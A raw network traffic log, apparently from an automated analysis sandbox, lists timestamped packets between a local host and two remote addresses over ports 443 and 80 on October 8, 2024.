Oct 8, 2024 20:47:34.869787931 CEST	49842	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:34.869796038 CEST	443	49842	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:34.877506971 CEST	443	49844	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:34.877899885 CEST	49844	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:34.877945900 CEST	443	49844	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:34.878221989 CEST	49844	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:34.878235102 CEST	443	49844	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:34.890631914 CEST	443	49841	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:34.890974998 CEST	443	49841	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:34.891058922 CEST	49841	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:34.891058922 CEST	49841	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:34.891117096 CEST	49841	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:34.891134024 CEST	443	49841	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:34.893785000 CEST	49846	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:34.893814087 CEST	443	49846	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:34.893894911 CEST	49846	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:34.894017935 CEST	49846	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:34.894042969 CEST	443	49846	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:34.971224070 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:34.975372076 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:34.978091002 CEST	443	49843	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:34.978427887 CEST	443	49843	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:34.978501081 CEST	49843	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:34.978571892 CEST	49843	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:34.978571892 CEST	49843	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:34.978610992 CEST	443	49843	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:34.978635073 CEST	443	49843	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:34.979557991 CEST	443	49842	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:34.979686975 CEST	443	49842	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:34.979860067 CEST	49842	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:34.979911089 CEST	49842	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:34.979911089 CEST	49842	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:34.979932070 CEST	443	49842	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:34.979942083 CEST	443	49842	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:34.981869936 CEST	49847	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:34.981950045 CEST	443	49847	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:34.982043982 CEST	49847	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:34.982055902 CEST	443	49844	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:34.982106924 CEST	443	49844	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:34.982155085 CEST	443	49844	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:34.982155085 CEST	49844	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:34.982197046 CEST	49847	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:34.982197046 CEST	49844	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:34.982234955 CEST	443	49847	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:34.982373953 CEST	49844	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:34.982393026 CEST	443	49844	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:34.982434034 CEST	49844	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:34.982446909 CEST	443	49844	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:34.983520985 CEST	49848	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:34.983613968 CEST	443	49848	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:34.983689070 CEST	49848	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:34.983819962 CEST	49848	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:34.983855963 CEST	443	49848	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:34.984924078 CEST	49849	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:34.984968901 CEST	443	49849	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:34.985049009 CEST	49849	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:34.985157013 CEST	49849	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:34.985177040 CEST	443	49849	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:35.216434956 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:35.221815109 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:35.487333059 CEST	443	49845	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:35.487823009 CEST	49845	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:35.487921000 CEST	443	49845	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:35.488256931 CEST	49845	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:35.488271952 CEST	443	49845	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:35.548962116 CEST	443	49846	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:35.549698114 CEST	49846	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:35.549735069 CEST	443	49846	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:35.550177097 CEST	49846	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:35.550189018 CEST	443	49846	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:35.593992949 CEST	443	49845	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:35.594279051 CEST	443	49845	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:35.594374895 CEST	49845	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:35.594446898 CEST	49845	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:35.594486952 CEST	443	49845	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:35.594548941 CEST	49845	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:35.594566107 CEST	443	49845	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:35.597296953 CEST	49850	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:35.597388029 CEST	443	49850	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:35.597498894 CEST	49850	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:35.597636938 CEST	49850	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:35.597667933 CEST	443	49850	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:35.629455090 CEST	443	49849	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:35.629826069 CEST	49849	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:35.629846096 CEST	443	49849	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:35.630309105 CEST	49849	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:35.630362034 CEST	443	49849	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:35.632445097 CEST	443	49848	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:35.632827044 CEST	49848	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:35.632905006 CEST	443	49848	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:35.633191109 CEST	49848	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:35.633205891 CEST	443	49848	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:35.652122021 CEST	443	49846	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:35.652189016 CEST	443	49846	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:35.652250051 CEST	49846	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:35.652446032 CEST	49846	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:35.652446032 CEST	49846	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:35.652466059 CEST	443	49846	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:35.652487040 CEST	443	49846	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:35.653058052 CEST	443	49847	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:35.653532028 CEST	49847	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:35.653592110 CEST	443	49847	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:35.653955936 CEST	49847	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:35.653970003 CEST	443	49847	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:35.655965090 CEST	49851	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:35.656028986 CEST	443	49851	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:35.656109095 CEST	49851	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:35.656847954 CEST	49851	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:35.656877041 CEST	443	49851	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:35.728801012 CEST	443	49849	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:35.729244947 CEST	443	49849	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:35.729326010 CEST	49849	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:35.729379892 CEST	49849	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:35.729379892 CEST	49849	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:35.729414940 CEST	443	49849	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:35.729441881 CEST	443	49849	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:35.731743097 CEST	49852	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:35.731770992 CEST	443	49852	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:35.731833935 CEST	49852	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:35.731934071 CEST	49852	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:35.731944084 CEST	443	49852	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:35.741435051 CEST	443	49848	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:35.741470098 CEST	443	49848	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:35.741507053 CEST	443	49848	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:35.741527081 CEST	49848	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:35.741580009 CEST	49848	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:35.741731882 CEST	49848	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:35.741731882 CEST	49848	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:35.741771936 CEST	443	49848	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:35.741807938 CEST	443	49848	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:35.743694067 CEST	49853	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:35.743767023 CEST	443	49853	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:35.743900061 CEST	49853	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:35.744033098 CEST	49853	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:35.744062901 CEST	443	49853	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:35.760863066 CEST	443	49847	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:35.761241913 CEST	443	49847	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:35.761305094 CEST	49847	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:35.761379004 CEST	49847	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:35.761379004 CEST	49847	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:35.761411905 CEST	443	49847	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:35.761435032 CEST	443	49847	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:35.763564110 CEST	49854	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:35.763626099 CEST	443	49854	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:35.763705015 CEST	49854	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:35.763897896 CEST	49854	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:35.763932943 CEST	443	49854	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:35.817461014 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:35.817527056 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:35.817584038 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:35.817635059 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:35.819539070 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:35.824563026 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:36.252285004 CEST	443	49850	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:36.254777908 CEST	49850	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:36.254865885 CEST	443	49850	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:36.255213022 CEST	49850	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:36.255228996 CEST	443	49850	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:36.645514011 CEST	443	49850	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:36.645545959 CEST	443	49850	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:36.645600080 CEST	443	49850	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:36.645670891 CEST	49850	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:36.645814896 CEST	49850	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:36.645832062 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:36.645854950 CEST	443	49850	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:36.645870924 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:36.645889044 CEST	49850	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:36.645905018 CEST	443	49850	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:36.645905018 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:36.645925999 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:36.645952940 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:36.645953894 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:36.646508932 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:36.646630049 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:36.646656990 CEST	443	49851	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:36.647759914 CEST	49851	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:36.647834063 CEST	443	49851	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:36.648199081 CEST	49851	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:36.648212910 CEST	443	49851	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:36.648587942 CEST	443	49853	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:36.649097919 CEST	49853	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:36.649158001 CEST	443	49853	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:36.649497986 CEST	49853	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:36.649509907 CEST	443	49853	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:36.649576902 CEST	443	49854	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:36.653044939 CEST	443	49852	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:36.653242111 CEST	49854	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:36.653274059 CEST	443	49854	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:36.653620958 CEST	49854	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:36.653631926 CEST	443	49854	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:36.661228895 CEST	49855	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:36.661281109 CEST	443	49855	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:36.661382914 CEST	49855	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:36.661787033 CEST	49852	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:36.661806107 CEST	443	49852	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:36.662115097 CEST	49852	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:36.662121058 CEST	443	49852	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:36.662149906 CEST	49855	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:36.662162066 CEST	443	49855	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:36.663289070 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:36.669661999 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:36.750360966 CEST	443	49851	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:36.750442982 CEST	443	49854	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:36.751000881 CEST	443	49851	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:36.751080036 CEST	49851	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:36.751171112 CEST	49851	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:36.751171112 CEST	49851	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:36.751211882 CEST	443	49851	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:36.751238108 CEST	443	49851	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:36.751307964 CEST	443	49854	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:36.751359940 CEST	443	49854	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:36.751424074 CEST	49854	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:36.751471996 CEST	49854	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:36.751498938 CEST	443	49854	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:36.751547098 CEST	49854	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:36.751560926 CEST	443	49854	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:36.753974915 CEST	443	49853	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:36.754065990 CEST	443	49853	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:36.754128933 CEST	49853	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:36.754848003 CEST	49856	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:36.754924059 CEST	443	49856	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:36.754967928 CEST	49857	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:36.755001068 CEST	49856	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:36.755016088 CEST	443	49857	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:36.755063057 CEST	49857	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:36.755136013 CEST	49856	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:36.755139112 CEST	49853	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:36.755150080 CEST	443	49853	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:36.755167961 CEST	443	49856	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:36.755220890 CEST	49853	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:36.755230904 CEST	443	49853	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:36.755306005 CEST	49857	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:36.755327940 CEST	443	49857	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:36.757149935 CEST	49858	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:36.757177114 CEST	443	49858	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:36.757236958 CEST	49858	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:36.757385969 CEST	49858	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:36.757414103 CEST	443	49858	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:36.760478973 CEST	443	49852	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:36.760579109 CEST	443	49852	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:36.760653973 CEST	49852	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:36.760672092 CEST	443	49852	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:36.760690928 CEST	443	49852	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:36.760747910 CEST	49852	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:36.760766029 CEST	49852	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:36.760775089 CEST	443	49852	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:36.760783911 CEST	49852	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:36.760787010 CEST	443	49852	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:36.762485981 CEST	49859	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:36.762517929 CEST	443	49859	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:36.762609005 CEST	49859	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:36.762712002 CEST	49859	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:36.762739897 CEST	443	49859	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:37.262541056 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:37.262612104 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:37.305152893 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:37.305231094 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:37.310318947 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:37.310348988 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:37.310401917 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:37.310651064 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:37.310678959 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:37.310713053 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:37.310728073 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:37.312189102 CEST	443	49855	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:37.312635899 CEST	49855	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:37.312645912 CEST	443	49855	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:37.313107014 CEST	49855	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:37.313111067 CEST	443	49855	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:37.315454006 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:37.315562010 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:37.315572977 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:37.315629005 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:37.316092014 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:37.316144943 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:37.316180944 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:37.316209078 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:37.316227913 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:37.316236019 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:37.316261053 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:37.316292048 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:37.320501089 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:37.320528030 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:37.320554972 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:37.320569038 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:37.320581913 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:37.320588112 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:37.320617914 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:37.320628881 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:37.321053028 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:37.321103096 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:37.321110010 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:37.321149111 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:37.321310997 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:37.321337938 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:37.321367025 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:37.321379900 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:37.321439028 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:37.321486950 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:37.325741053 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:37.325790882 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:37.325839996 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:37.325901985 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:37.326634884 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:37.326683044 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:37.326703072 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:37.326709986 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:37.326734066 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:37.326759100 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:37.331118107 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:37.331178904 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:37.331608057 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:37.331662893 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:37.331865072 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:37.331893921 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:37.331916094 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:37.331921101 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:37.331943035 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:37.331948042 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:37.331964970 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:37.331979990 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:37.331990957 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:37.332024097 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:37.336410046 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:37.336438894 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:37.336469889 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:37.336469889 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:37.336512089 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:37.336518049 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:37.336781025 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:37.336810112 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:37.336837053 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:37.336848021 CEST	49755	80	192.168.2.5	95.164.90.97
